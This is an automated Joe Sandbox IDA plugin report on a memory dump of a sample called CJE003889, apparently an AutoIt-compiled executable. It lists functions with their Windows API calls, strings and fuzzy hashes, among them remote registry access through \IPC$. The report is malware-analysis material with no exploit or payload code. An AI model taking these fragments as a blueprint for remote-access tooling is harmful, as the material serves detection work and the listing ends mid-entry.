Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: fba49c34a62323bf238f665cb6217187be917c43c6ab8c9baf17114fb72d2262
Instruction ID: 1f0b875b2df01a4e51c7098c6db3e46117517368df43070f21475f4b670440e3
Opcode Fuzzy Hash: fba49c34a62323bf238f665cb6217187be917c43c6ab8c9baf17114fb72d2262
Instruction Fuzzy Hash: CE71E470601219BFEB219F55DC89FAABF64FF04724F14022EF625AA1E1C7B15D10DBA0

Function 00CB77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06

_memset.LIBCMT ref: 00CB786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00CB78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00CB78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00CB78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00CB7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00CB792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CB7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CB793A

Strings

\CLSID, xrefs: 00CB7822
SOFTWARE\Classes\, xrefs: 00CB780C
\IPC$, xrefs: 00CB7882

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 172e8600f550492b261d0b2dd578aa7efc0b7586ed7360c8df3150a923d7075a
Instruction ID: 0c20dfcf77dd7a936c827f01459d5bdcebf2e1681409aeb0de15aa631f94edc9
Opcode Fuzzy Hash: 172e8600f550492b261d0b2dd578aa7efc0b7586ed7360c8df3150a923d7075a
Instruction Fuzzy Hash: B8411872C1422DABCF21EBA4DC85DEEB778BF44354F044629F815A71A1DA319E05DB90

Function 00CE0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDFDAD,?,?), ref: 00CE0E31

Strings

HKCR, xrefs: 00CE0ED9
HKLM, xrefs: 00CE0EAF
HKEY_CLASSES_ROOT, xrefs: 00CE0EC4
HKEY_LOCAL_MACHINE, xrefs: 00CE0E9A
HKEY_USERS, xrefs: 00CE0F32
HKEY_CURRENT_USER, xrefs: 00CE0F10
HKCU, xrefs: 00CE0F21
HKEY_CURRENT_CONFIG, xrefs: 00CE0EEE
HKU, xrefs: 00CE0F43
HKCC, xrefs: 00CE0EFF

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 60dc2aa09ad573aab147a6788c852645946d94ccc734bc0a71e1b6dbb49f3d85
Instruction ID: 53b34718772d80a00f35519fdda665ae8f793f7d5f8d296a00490c8413bb3136
Opcode Fuzzy Hash: 60dc2aa09ad573aab147a6788c852645946d94ccc734bc0a71e1b6dbb49f3d85
Instruction Fuzzy Hash: ED4162351003899BDF24EF51E8A6AEF3764BF11304F640454FCA51B291DB749EAADBE0

Function 00CBF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C9E2A0,00000010,?,Bad directive syntax error,00CEF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00CBF7C2
LoadStringW.USER32(00000000,?,00C9E2A0,00000010), ref: 00CBF7C9

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

_wprintf.LIBCMT ref: 00CBF7FC
__swprintf.LIBCMT ref: 00CBF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CBF88D

Strings

Error: , xrefs: 00CBF85B
%s (%d) : ==> %s.: %s %s, xrefs: 00CBF7F7
Line %d (File "%s"):, xrefs: 00CBF833
Line %d:, xrefs: 00CBF818
., xrefs: 00CBF873

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 9e8a7d37545002c15ca088973ff0c18acce9a0d57d26f035a18b0b910f4a9cc9
Instruction ID: c8a1cf92ee0754c341193ae1d8c7615f9ed509416b7db5b11de934272d37d7cd
Opcode Fuzzy Hash: 9e8a7d37545002c15ca088973ff0c18acce9a0d57d26f035a18b0b910f4a9cc9
Instruction Fuzzy Hash: 9021653290025DFFCF11EF90DC4AEED7739BF14304F044869F515661A1EA72A659EB50

Function 00CC52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06

Part of subcall function 00C67924: _memmove.LIBCMT ref: 00C679AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CC5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CC5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CC5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CC5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CC537A

Strings

open , xrefs: 00CC52DF
play PlayMe, xrefs: 00CC5375
status PlayMe mode, xrefs: 00CC532B
play PlayMe wait, xrefs: 00CC5364
close PlayMe, xrefs: 00CC5341, 00CC536E
alias PlayMe, xrefs: 00CC5309

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 9b59d78ee551f955180663eac665342e56be8131f95ec7e3af2d9d6f908a54b1
Instruction ID: 281f76fc2056771daaf5f56a4a4aa0adb80b87a8bf30a5f67220a5281e703713
Opcode Fuzzy Hash: 9b59d78ee551f955180663eac665342e56be8131f95ec7e3af2d9d6f908a54b1
Instruction Fuzzy Hash: 11118231A501697DD720F661DC8AEFFBBBCEBD5B84F140929B411A20E1DEA01D89D9B0

Function 00CC46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00CC46D2
gethostname.WSOCK32(?,00000100), ref: 00CC46EC
gethostbyname.WSOCK32(?), ref: 00CC46F9
_wcscpy.LIBCMT ref: 00CC4721
_memmove.LIBCMT ref: 00CC4734
inet_ntoa.WSOCK32(?), ref: 00CC473F
_strcat.LIBCMT ref: 00CC474D
_wcscpy.LIBCMT ref: 00CC4764
WSACleanup.WSOCK32 ref: 00CC4772
_wcscpy.LIBCMT ref: 00CC4780

Strings

0.0.0.0, xrefs: 00CC471B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 5fc70542298e8605153f66b3ded532aa32e2d4a971499dc1bd92f67be24b758e
Instruction ID: 7ce4cd6e207ad565fbfc07a29507b60f1867b628dd2816b1bfa4cb0e74b72dad
Opcode Fuzzy Hash: 5fc70542298e8605153f66b3ded532aa32e2d4a971499dc1bd92f67be24b758e
Instruction Fuzzy Hash: 3D11C332900114ABCB28BB30DC8AFDE77ACEB02715F0441BEF84596091EF709A82D754

Function 00CC4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00CC4F7A

Part of subcall function 00C8049F: timeGetTime.WINMM(?,75C0B400,00C70E7B), ref: 00C804A3

Sleep.KERNEL32(0000000A), ref: 00CC4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00CC4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CC4FEC
SetActiveWindow.USER32 ref: 00CC500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CC5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00CC5038
Sleep.KERNEL32(000000FA), ref: 00CC5043
IsWindow.USER32 ref: 00CC504F
EndDialog.USER32(00000000), ref: 00CC5060

Strings

BUTTON, xrefs: 00CC4FDE

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: ba3c05beeb5308b465a82fcbeb6afcfb304abba2cb833c3214443e081815e0a9
Instruction ID: 5e2fb817d1392e84384d79365f24cdd9c5ce7cf15425d757378640d2ade4031e
Opcode Fuzzy Hash: ba3c05beeb5308b465a82fcbeb6afcfb304abba2cb833c3214443e081815e0a9
Instruction Fuzzy Hash: 2C218870200B84AFEB205F60ECC8F2A3B69EBA5745F04502CF501C62B1CB719E829A72

Function 00CCD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

CoInitialize.OLE32(00000000), ref: 00CCD5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CCD67D
SHGetDesktopFolder.SHELL32(?), ref: 00CCD691
CoCreateInstance.OLE32(00CF2D7C,00000000,00000001,00D18C1C,?), ref: 00CCD6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CCD74C
CoTaskMemFree.OLE32(?,?), ref: 00CCD7A4
_memset.LIBCMT ref: 00CCD7E1
SHBrowseForFolderW.SHELL32(?), ref: 00CCD81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CCD840
CoTaskMemFree.OLE32(00000000), ref: 00CCD847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00CCD87E
CoUninitialize.OLE32(00000001,00000000), ref: 00CCD880

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 258133ccda61612c4a00eaf655f49b58eabf41764b215a08c91f92408dd98159
Instruction ID: ef0f4bd9bcf53b9ee8069276b68aabc30b6a455b6d978006033aef348ae03f2a
Opcode Fuzzy Hash: 258133ccda61612c4a00eaf655f49b58eabf41764b215a08c91f92408dd98159
Instruction Fuzzy Hash: 65B1EC75A00109AFDB14DFA4C888EAEBBB9FF48314F148469F91AEB251DB30ED45DB50

Function 00CBC267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00CBC283
GetWindowRect.USER32(00000000,?), ref: 00CBC295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00CBC2F3
GetDlgItem.USER32(?,00000002), ref: 00CBC2FE
GetWindowRect.USER32(00000000,?), ref: 00CBC310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00CBC364
GetDlgItem.USER32(?,000003E9), ref: 00CBC372
GetWindowRect.USER32(00000000,?), ref: 00CBC383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00CBC3C6
GetDlgItem.USER32(?,000003EA), ref: 00CBC3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CBC3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00CBC3FE

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 73d448b74c8632d46a93f539b9f6812e62748a09edc014bf7c0d8ea49e28d9d7
Instruction ID: 3a73615f8be19bab8a6fd12a5ccfa0dbd0195fe20669c7f75321b6ffe87fd797
Opcode Fuzzy Hash: 73d448b74c8632d46a93f539b9f6812e62748a09edc014bf7c0d8ea49e28d9d7
Instruction Fuzzy Hash: E2514F71B00205AFDB18CFA9DDD9BAEBBBAEB88710F14812DF515D72A0D7709E018B10

Function 00C6201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C62036,?,00000000,?,?,?,?,00C616CB,00000000,?), ref: 00C61B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C620D3
KillTimer.USER32(-00000001,?,?,?,?,00C616CB,00000000,?,?,00C61AE2,?,?), ref: 00C6216E
DestroyAcceleratorTable.USER32(00000000), ref: 00C9BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C616CB,00000000,?,?,00C61AE2,?,?), ref: 00C9BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C616CB,00000000,?,?,00C61AE2,?,?), ref: 00C9BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C616CB,00000000,?,?,00C61AE2,?,?), ref: 00C9BD0A
DeleteObject.GDI32(00000000), ref: 00C9BD1C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: b080e8d9f0dd33f18f0efa2faa9f99770db4e9a61b8cb23d0b598872f7ea6d12
Instruction ID: afa987dd3212039587bc21d8208e46339137e725c66476aaa0c248a67c0074a9
Opcode Fuzzy Hash: b080e8d9f0dd33f18f0efa2faa9f99770db4e9a61b8cb23d0b598872f7ea6d12
Instruction Fuzzy Hash: B3618B31101B40EFCB359F15EA88B29B7F1FF50312F10842DE5529BA64C7B1AD92DB60

Function 00C621A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00C625DB: GetWindowLongW.USER32(?,000000EB), ref: 00C625EC

GetSysColor.USER32(0000000F), ref: 00C621D3

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 1a35f2a965f0dcbca9a6882633f12e915c2188d1be22dcc2360e61289bb53419
Instruction ID: cd8e9e35d24d04fa7b6513262a3a56f9d33b2124a5fb7e2373a5bb62fc89c307
Opcode Fuzzy Hash: 1a35f2a965f0dcbca9a6882633f12e915c2188d1be22dcc2360e61289bb53419
Instruction Fuzzy Hash: 12416D31005944ABDB255F28ECD8BBD3B65EB46331F148269FE658E1E5C7318E42DB21

Function 00CCA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00CEF910), ref: 00CCA90B
GetDriveTypeW.KERNEL32(00000061,00D189A0,00000061), ref: 00CCA9D5
_wcscpy.LIBCMT ref: 00CCA9FF

Strings

ramdisk, xrefs: 00CCA97F
all, xrefs: 00CCA911
removable, xrefs: 00CCA93D
network, xrefs: 00CCA969
cdrom, xrefs: 00CCA927
fixed, xrefs: 00CCA953
unknown, xrefs: 00CCA996

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 034637756aa61ca1caae19cfa2c879859603839332e655b9d7cee97f4e943c25
Instruction ID: 7e75e4a5c0688686b8405b87b35c3afb9cd945bfb51487827583348ca86f2767
Opcode Fuzzy Hash: 034637756aa61ca1caae19cfa2c879859603839332e655b9d7cee97f4e943c25
Instruction Fuzzy Hash: E751AB31108305ABC314EF14D896FAFB7A9EF84708F14482DF496572A2DB319A49EB53

Function 00C69837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00C69862
__swprintf.LIBCMT ref: 00C698AC
__i64tow.LIBCMT ref: 00C9F5E6

Strings

%.15g, xrefs: 00C698A6
False, xrefs: 00C9F5AE
0x%p, xrefs: 00C9F5C8
True, xrefs: 00C9F5A7

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 524e446463546f37733bb1d0517e7de1c2c415b5975722f7888924935a7ec203
Instruction ID: e6cf1c7675260c05a0c316c7adb9a538bb9ebb61c1e99d157487ee45c09758ab
Opcode Fuzzy Hash: 524e446463546f37733bb1d0517e7de1c2c415b5975722f7888924935a7ec203
Instruction Fuzzy Hash: 5E411471500205AFEF24EF75D886E7A73E8FF49314F20486EE559D7292EA31AA42DB10

Function 00CE7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CE716A
CreateMenu.USER32 ref: 00CE7185
SetMenu.USER32(?,00000000), ref: 00CE7194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE7221
IsMenu.USER32(?), ref: 00CE7237
CreatePopupMenu.USER32 ref: 00CE7241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CE726E
DrawMenuBar.USER32 ref: 00CE7276

Strings

0, xrefs: 00CE7160
F, xrefs: 00CE7262

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: a29c43d957349c333adb5b6a15e515bab2113d830e21b239f80e5187414e3316
Instruction ID: 44ecf5ac7e1aec08a8f554b05a03e74888c569dd7292390b64525dc3a987f698
Opcode Fuzzy Hash: a29c43d957349c333adb5b6a15e515bab2113d830e21b239f80e5187414e3316
Instruction Fuzzy Hash: 9E415875A01245EFDB20DF65E884FAABBB5FF58310F144129FA15AB361D731AA10CFA0

Function 00CE74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CE755E
CreateCompatibleDC.GDI32(00000000), ref: 00CE7565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CE7578
SelectObject.GDI32(00000000,00000000), ref: 00CE7580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00CE758B
DeleteDC.GDI32(00000000), ref: 00CE7594
GetWindowLongW.USER32(?,000000EC), ref: 00CE759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00CE75B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00CE75BE

Strings

static, xrefs: 00CE74F6

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
